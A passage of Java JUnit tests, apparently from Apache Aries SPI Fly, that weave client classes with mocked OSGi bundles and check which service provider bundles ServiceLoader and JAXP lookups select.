WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
Assert.assertNotNull("Precondition", clsUrl);
String clientClassName = "org.apache.aries.spifly.dynamic.TestClient";
WovenClass wc = new MyWovenClass(clsUrl, clientClassName, consumerBundle);
Assert.assertEquals("Precondition", 0, wc.getDynamicImports().size());
wh.weave(wc);
Assert.assertEquals(1, wc.getDynamicImports().size());
String di1 = "org.apache.aries.spifly;bundle-symbolic-name=spifly;bundle-version=1.9.4";
String di2 = "org.apache.aries.spifly;bundle-version=1.9.4;bundle-symbolic-name=spifly";
String di = wc.getDynamicImports().get(0);
Assert.assertTrue("Weaving should have added a dynamic import", di1.equals(di) || di2.equals(di));
// Invoke the woven class and check that it properly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl1 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Assert.assertEquals(Collections.singleton("olleh"), result);
}
@Test
public void testTCCLResetting() throws Exception {
ClassLoader cl = new URLClassLoader(new URL [] {});
Thread.currentThread().setContextClassLoader(cl);
Assert.assertSame("Precondition", cl, Thread.currentThread().getContextClassLoader());
Dictionary<String, String> consumerHeaders = new Hashtable<String, String>();
consumerHeaders.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "*");
// Register the bundle that provides the SPI implementation.
Bundle providerBundle = mockProviderBundle("impl1", 1);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(consumerHeaders, providerBundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle("spifly", Version.parseVersion("1.9.4"), consumerBundle, providerBundle);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
Assert.assertNotNull("Precondition", clsUrl);
String clientClassName = "org.apache.aries.spifly.dynamic.TestClient";
WovenClass wc = new MyWovenClass(clsUrl, clientClassName, consumerBundle);
Assert.assertEquals("Precondition", 0, wc.getDynamicImports().size());
wh.weave(wc);
Assert.assertEquals(1, wc.getDynamicImports().size());
String di1 = "org.apache.aries.spifly;bundle-symbolic-name=spifly;bundle-version=1.9.4";
String di2 = "org.apache.aries.spifly;bundle-version=1.9.4;bundle-symbolic-name=spifly";
String di = wc.getDynamicImports().get(0);
Assert.assertTrue("Weaving should have added a dynamic import", di1.equals(di) || di2.equals(di));
// Invoke the woven class and check that it properly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl1 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
method.invoke(cls.newInstance(), "hi there");
Assert.assertSame(cl, Thread.currentThread().getContextClassLoader());
}
@Test
public void testTCCLResettingOnException() {
// TODO
}
@Test
public void testAltServiceLoaderLoadUnprocessed() throws Exception {
Bundle spiFlyBundle = mockSpiFlyBundle();
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "*");
Bundle consumerBundle = mockConsumerBundle(headers, spiFlyBundle);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("UnaffectedTestClient.class");
Assert.assertNotNull("Precondition", clsUrl);
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.UnaffectedTestClient", consumerBundle);
Assert.assertEquals("Precondition", 0, wc.getDynamicImports().size());
wh.weave(wc);
Assert.assertEquals("The client is not affected so no additional imports should have been added",
0, wc.getDynamicImports().size());
// ok the weaving is done, now prepare the registry for the call
Bundle providerBundle = mockProviderBundle("impl1", 1);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle, new HashMap<String, Object>());
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl1 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Assert.assertEquals("impl4", result);
}
@Test
public void testMultipleProviders() throws Exception {
Bundle spiFlyBundle = mockSpiFlyBundle();
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "*");
Bundle consumerBundle = mockConsumerBundle(headers, spiFlyBundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI files from impl1 and impl2 are visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("olleh", "HELLO", "5"));
Assert.assertEquals("All three services should be invoked", expected, result);
}
@Test
public void testClientSpecifyingProvider() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "java.util.ServiceLoader#load(java.lang.Class);bundle=impl2");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("HELLO", "5"));
Assert.assertEquals("Only the services from bundle impl2 should be selected", expected, result);
}
@Test
public void testClientSpecifyingProviderVersion() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "java.util.ServiceLoader#load(java.lang.Class);bundle=impl2:version=1.2.3");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle3 = mockProviderBundle("impl2_123", 3, new Version(1, 2, 3));
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle3, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2, providerBundle3);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2, providerBundle3);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Assert.assertEquals("Only the services from bundle impl2 should be selected", Collections.singleton("Updated!hello!Updated"), result);
}
@Test
public void testClientMultipleTargetBundles() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"java.util.ServiceLoader#load(java.lang.Class);bundle=impl1|impl4");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle4 = mockProviderBundle("impl4", 4);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle4, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle4, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2, providerBundle4);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2, providerBundle4);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("olleh", "impl4"));
Assert.assertEquals("All providers should be selected for this one", expected, result);
}
@Test
public void testClientMultipleTargetBundles2() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"java.util.ServiceLoader#load(java.lang.Class);bundleId=1|4");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle4 = mockProviderBundle("impl4", 4);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle4, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle4, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2, providerBundle4);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2, providerBundle4);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("olleh", "impl4"));
Assert.assertEquals("All providers should be selected for this one", expected, result);
}
@Test
public void testClientSpecificProviderLoadArgument() throws Exception {
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"java.util.ServiceLoader#load(java.lang.Class[org.apache.aries.mytest.MySPI])," +
"java.util.ServiceLoader#load(java.lang.Class[org.apache.aries.mytest.AltSPI]);bundle=impl4");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle4 = mockProviderBundle("impl4", 4);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle4, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle4, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle1, providerBundle2, providerBundle4);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle, providerBundle1, providerBundle2, providerBundle4);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.TestClient", consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Set<String> expected = new HashSet<String>(Arrays.asList("olleh", "impl4", "HELLO", "5"));
Assert.assertEquals("All providers should be selected for this one", expected, result);
// Weave the AltTestClient class.
URL cls2Url = getClass().getResource("AltTestClient.class");
WovenClass wc2 = new MyWovenClass(cls2Url, "org.apache.aries.spifly.dynamic.AltTestClient", consumerBundle);
wh.weave(wc2);
// Invoke the AltTestClient
Class<?> cls2 = wc2.getDefinedClass();
Method method2 = cls2.getMethod("test", new Class [] {long.class});
Object result2 = method2.invoke(cls2.newInstance(), 4096);
Assert.assertEquals("Only the services from bundle impl4 should be selected", -4096L, result2);
}
@Test
public void testClientSpecifyingDifferentMethodsLimitedToDifferentProviders() throws Exception {
Dictionary<String, String> headers1 = new Hashtable<String, String>();
headers1.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"javax.xml.parsers.DocumentBuilderFactory#newInstance();bundle=impl3," +
"java.util.ServiceLoader#load(java.lang.Class[org.apache.aries.mytest.MySPI]);bundle=impl4");
Dictionary<String, String> headers2 = new Hashtable<String, String>();
headers2.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"javax.xml.parsers.DocumentBuilderFactory#newInstance();bundle=system.bundle," +
"java.util.ServiceLoader#load;bundle=impl1");
Dictionary<String, String> headers3 = new Hashtable<String, String>();
headers3.put(SpiFlyConstants.SPI_CONSUMER_HEADER,
"org.acme.blah#someMethod();bundle=mybundle");
Bundle providerBundle1 = mockProviderBundle("impl1", 1);
Bundle providerBundle2 = mockProviderBundle("impl2", 2);
Bundle providerBundle3 = mockProviderBundle("impl3", 3);
Bundle providerBundle4 = mockProviderBundle("impl4", 4);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle1, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle2, new HashMap<String, Object>());
activator.registerProviderBundle("javax.xml.parsers.DocumentBuilderFactory", providerBundle3, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle4, new HashMap<String, Object>());
activator.registerProviderBundle("org.apache.aries.mytest.AltSPI", providerBundle4, new HashMap<String, Object>());
Bundle consumerBundle1 = mockConsumerBundle(headers1, providerBundle1, providerBundle2, providerBundle3, providerBundle4);
activator.addConsumerWeavingData(consumerBundle1, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle consumerBundle2 = mockConsumerBundle(headers2, providerBundle1, providerBundle2, providerBundle3, providerBundle4);
activator.addConsumerWeavingData(consumerBundle2, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle consumerBundle3 = mockConsumerBundle(headers3, providerBundle1, providerBundle2, providerBundle3, providerBundle4);
activator.addConsumerWeavingData(consumerBundle3, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle(consumerBundle1, consumerBundle2, consumerBundle3,
providerBundle1, providerBundle2, providerBundle3, providerBundle4);
WeavingHook wh = new ClientWeavingHook(spiFlyBundle.getBundleContext(), activator);
testConsumerBundleWeaving(consumerBundle1, wh, Collections.singleton("impl4"), "org.apache.aries.spifly.dynamic.impl3.MyAltDocumentBuilderFactory");
testConsumerBundleWeaving(consumerBundle2, wh, Collections.singleton("olleh"), thisJVMsDBF);
testConsumerBundleWeaving(consumerBundle3, wh, Collections.<String>emptySet(), thisJVMsDBF);
}
private void testConsumerBundleWeaving(Bundle consumerBundle, WeavingHook wh, Set<String> testClientResult, String jaxpClientResult) throws Exception {
// Weave the TestClient class.
URL clsUrl = getClass().getResource("TestClient.class");
WovenClass wc = new MyWovenClass(clsUrl, TestClient.class.getName(), consumerBundle);
wh.weave(wc);
// Invoke the woven class and check that it propertly sets the TCCL so that the
// META-INF/services/org.apache.aries.mytest.MySPI file from impl2 is visible.
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {String.class});
Object result = method.invoke(cls.newInstance(), "hello");
Assert.assertEquals(testClientResult, result);
URL clsUrl2 = getClass().getResource("JaxpClient.class");
WovenClass wc2 = new MyWovenClass(clsUrl2, JaxpClient.class.getName(), consumerBundle);
wh.weave(wc2);
Class<?> cls2 = wc2.getDefinedClass();
Method method2 = cls2.getMethod("test", new Class [] {});
Class<?> result2 = (Class<?>) method2.invoke(cls2.newInstance());
Assert.assertEquals(jaxpClientResult, result2.getName());
}
@Test
public void testJAXPClientWantsJREImplementation1() throws Exception {
Bundle systembundle = mockSystemBundle();
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "javax.xml.parsers.DocumentBuilderFactory#newInstance()");
Bundle consumerBundle = mockConsumerBundle(headers, systembundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
WeavingHook wh = new ClientWeavingHook(mockSpiFlyBundle(consumerBundle, systembundle).getBundleContext(), activator);
URL clsUrl = getClass().getResource("JaxpClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.JaxpClient", consumerBundle);
wh.weave(wc);
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {});
Class<?> result = (Class<?>) method.invoke(cls.newInstance());
Assert.assertEquals("JAXP implementation from JRE", thisJVMsDBF, result.getName());
}
// If there is an alternate implementation it should always be favoured over the JRE one
@Test
public void testJAXPClientWantsAltImplementation1() throws Exception {
Bundle systembundle = mockSystemBundle();
Bundle providerBundle = mockProviderBundle("impl3", 1);
activator.registerProviderBundle("javax.xml.parsers.DocumentBuilderFactory", providerBundle, new HashMap<String, Object>());
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "javax.xml.parsers.DocumentBuilderFactory#newInstance()");
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle, systembundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
WeavingHook wh = new ClientWeavingHook(mockSpiFlyBundle(consumerBundle, providerBundle, systembundle).getBundleContext(), activator);
URL clsUrl = getClass().getResource("JaxpClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.JaxpClient", consumerBundle);
wh.weave(wc);
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {});
Class<?> result = (Class<?>) method.invoke(cls.newInstance());
Assert.assertEquals("JAXP implementation from JRE", "org.apache.aries.spifly.dynamic.impl3.MyAltDocumentBuilderFactory", result.getName());
}
@Test
public void testJAXPClientWantsJREImplementation2() throws Exception {
Bundle systembundle = mockSystemBundle();
Bundle providerBundle = mockProviderBundle("impl3", 1);
activator.registerProviderBundle("javax.xml.parsers.DocumentBuilderFactory", providerBundle, new HashMap<String, Object>());
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "javax.xml.parsers.DocumentBuilderFactory#newInstance();bundleId=0");
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle, systembundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
WeavingHook wh = new ClientWeavingHook(mockSpiFlyBundle(consumerBundle, providerBundle, systembundle).getBundleContext(), activator);
URL clsUrl = getClass().getResource("JaxpClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.JaxpClient", consumerBundle);
wh.weave(wc);
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {});
Class<?> result = (Class<?>) method.invoke(cls.newInstance());
Assert.assertEquals("JAXP implementation from JRE", thisJVMsDBF, result.getName());
}
@Test
public void testJAXPClientWantsAltImplementation2() throws Exception {
Bundle systembundle = mockSystemBundle();
Bundle providerBundle = mockProviderBundle("impl3", 1);
activator.registerProviderBundle("javax.xml.parsers.DocumentBuilderFactory", providerBundle, new HashMap<String, Object>());
Dictionary<String, String> headers = new Hashtable<String, String>();
headers.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "javax.xml.parsers.DocumentBuilderFactory#newInstance();bundle=impl3");
Bundle consumerBundle = mockConsumerBundle(headers, providerBundle, systembundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
WeavingHook wh = new ClientWeavingHook(mockSpiFlyBundle(consumerBundle, providerBundle, systembundle).getBundleContext(), activator);
URL clsUrl = getClass().getResource("JaxpClient.class");
WovenClass wc = new MyWovenClass(clsUrl, "org.apache.aries.spifly.dynamic.JaxpClient", consumerBundle);
wh.weave(wc);
Class<?> cls = wc.getDefinedClass();
Method method = cls.getMethod("test", new Class [] {});
Class<?> result = (Class<?>) method.invoke(cls.newInstance());
Assert.assertEquals("JAXP implementation from alternative bundle", "org.apache.aries.spifly.dynamic.impl3.MyAltDocumentBuilderFactory", result.getName());
}
private Bundle mockSpiFlyBundle(Bundle ... bundles) throws Exception {
return mockSpiFlyBundle("spifly", new Version(1, 0, 0), bundles);
}
private Bundle mockSpiFlyBundle(String bsn, Version version, Bundle ... bundles) throws Exception {
Bundle spiFlyBundle = EasyMock.createMock(Bundle.class);
BundleContext spiFlyBundleContext = EasyMock.createMock(BundleContext.class);
EasyMock.expect(spiFlyBundleContext.getBundle()).andReturn(spiFlyBundle).anyTimes();
List<Bundle> allBundles = new ArrayList<Bundle>(Arrays.asList(bundles));
allBundles.add(spiFlyBundle);
EasyMock.expect(spiFlyBundleContext.getBundles()).andReturn(allBundles.toArray(new Bundle [] {})).anyTimes();
EasyMock.replay(spiFlyBundleContext);
EasyMock.expect(spiFlyBundle.getSymbolicName()).andReturn(bsn).anyTimes();
EasyMock.expect(spiFlyBundle.getVersion()).andReturn(version).anyTimes();
EasyMock.expect(spiFlyBundle.getBundleId()).andReturn(Long.MAX_VALUE).anyTimes();
EasyMock.expect(spiFlyBundle.getBundleContext()).andReturn(spiFlyBundleContext).anyTimes();
EasyMock.replay(spiFlyBundle);
// Set the bundle context for testing purposes
Field bcField = BaseActivator.class.getDeclaredField("bundleContext");
bcField.setAccessible(true);
bcField.set(activator, spiFlyBundle.getBundleContext());
return spiFlyBundle;
}
private Bundle mockProviderBundle(String subdir, long id) throws Exception {
return mockProviderBundle(subdir, id, Version.emptyVersion);
}
private Bundle mockProviderBundle(String subdir, long id, Version version) throws Exception {
URL url = getClass().getResource("/" + getClass().getName().replace('.', '/') + ".class");
File classFile = new File(url.getFile());
File baseDir = new File(classFile.getParentFile(), subdir);
File directory = new File(baseDir, "/META-INF/services");
final List<String> classNames = new ArrayList<String>();
// Do a directory listing of the applicable META-INF/services directory
List<String> resources = new ArrayList<String>();
for (File f : directory.listFiles()) {
String fileName = f.getName();
if (fileName.startsWith(".") || fileName.endsWith("."))
continue;
classNames.addAll(getClassNames(f));
// Needs to be something like: META-INF/services/org.apache.aries.mytest.MySPI
String path = f.getAbsolutePath().substring(baseDir.getAbsolutePath().length());
path = path.replace('\\', '/');
if (path.startsWith("/")) {
path = path.substring(1);
}
resources.add(path);
}
// Set up the classloader that will be used by the ASM-generated code as the TCCL.
// It can load a META-INF/services file
final ClassLoader cl = new TestProviderBundleClassLoader(subdir, resources.toArray(new String [] {}));
final List<String> classResources = new ArrayList<String>();
for(String className : classNames) {
classResources.add("/" + className.replace('.', '/') + ".class");
}
BundleContext bc = EasyMock.createNiceMock(BundleContext.class);
EasyMock.replay(bc);
Bundle providerBundle = EasyMock.createMock(Bundle.class);
String bsn = subdir;
int idx = bsn.indexOf('_');
if (idx > 0) {
bsn = bsn.substring(0, idx);
}
EasyMock.expect(providerBundle.getSymbolicName()).andReturn(bsn).anyTimes();
EasyMock.expect(providerBundle.getBundleId()).andReturn(id).anyTimes();
EasyMock.expect(providerBundle.getBundleContext()).andReturn(bc).anyTimes();
EasyMock.expect(providerBundle.getVersion()).andReturn(version).anyTimes();
EasyMock.expect(providerBundle.getEntryPaths("/")).andAnswer(new IAnswer<Enumeration<String>>() {
@Override
public Enumeration<String> answer() throws Throwable {
return Collections.enumeration(classResources);
}
}).anyTimes();
EasyMock.<Class<?>>expect(providerBundle.loadClass(EasyMock.anyObject(String.class))).andAnswer(new IAnswer<Class<?>>() {
@Override
public Class<?> answer() throws Throwable {
String name = (String) EasyMock.getCurrentArguments()[0];
if (!classNames.contains(name)) {
throw new ClassCastException(name);
}
return cl.loadClass(name);
}
}).anyTimes();
EasyMock.replay(providerBundle);
return providerBundle;
}
private Collection<String> getClassNames(File f) throws IOException {
List<String> names = new ArrayList<String>();
BufferedReader br = new BufferedReader(new FileReader(f));
try {
String line = null;
while((line = br.readLine()) != null) {
names.add(line.trim());
}
} finally {
br.close();
}
return names;
}
private Bundle mockConsumerBundle(Dictionary<String, String> headers, Bundle ... otherBundles) {
// Create a mock object for the client bundle which holds the code that uses ServiceLoader.load()
// or another SPI invocation.
BundleContext bc = EasyMock.createMock(BundleContext.class);
Bundle consumerBundle = EasyMock.createMock(Bundle.class);
EasyMock.expect(consumerBundle.getSymbolicName()).andReturn("testConsumer").anyTimes();
EasyMock.expect(consumerBundle.getHeaders()).andReturn(headers).anyTimes();
EasyMock.expect(consumerBundle.getBundleContext()).andReturn(bc).anyTimes();
EasyMock.expect(consumerBundle.getBundleId()).andReturn(Long.MAX_VALUE).anyTimes();
EasyMock.expect(consumerBundle.adapt(BundleRevision.class)).andReturn(null).anyTimes();
EasyMock.replay(consumerBundle);
List<Bundle> allBundles = new ArrayList<Bundle>(Arrays.asList(otherBundles));
allBundles.add(consumerBundle);
EasyMock.expect(bc.getBundles()).andReturn(allBundles.toArray(new Bundle [] {})).anyTimes();
EasyMock.replay(bc);
return consumerBundle;
}
private Bundle mockSystemBundle() {
Bundle systemBundle = EasyMock.createMock(Bundle.class);
EasyMock.expect(systemBundle.getBundleId()).andReturn(0L).anyTimes();
EasyMock.expect(systemBundle.getSymbolicName()).andReturn("system.bundle").anyTimes();
EasyMock.replay(systemBundle);
return systemBundle;
}
// A classloader that loads anything starting with org.apache.aries.spifly.dynamic.impl1 from it
// and the rest from the parent. This is to mimic a bundle that holds a specific SPI implementation.
public static class TestProviderBundleClassLoader extends URLClassLoader {
private final List<String> resources;
private final String prefix;
private final String classPrefix;
private final Map<String, Class<?>> loadedClasses = new ConcurrentHashMap<String, Class<?>>();
public TestProviderBundleClassLoader(String subdir, String ... resources) {
super(new URL [] {}, TestProviderBundleClassLoader.class.getClassLoader());
this.prefix = TestProviderBundleClassLoader.class.getPackage().getName().replace('.', '/') + "/" + subdir + "/";
this.classPrefix = prefix.replace('/', '.');
this.resources = Arrays.asList(resources);
}
@Override
public Class<?> loadClass(String name) throws ClassNotFoundException {
if (name.startsWith(classPrefix))
return loadClassLocal(name);
return super.loadClass(name);
}
@Override
protected synchronized Class<?> loadClass(String name, boolean resolve) throws ClassNotFoundException {
if (name.startsWith(classPrefix)) {
Class<?> cls = loadClassLocal(name);
if (resolve)
resolveClass(cls);
return cls;
}
return super.loadClass(name, resolve);
}
protected Class<?> loadClassLocal(String name) throws ClassNotFoundException {
Class<?> prevLoaded = loadedClasses.get(name);
if (prevLoaded != null)
return prevLoaded;
URL res = TestProviderBundleClassLoader.class.getClassLoader().getResource(name.replace('.', '/') + ".class");
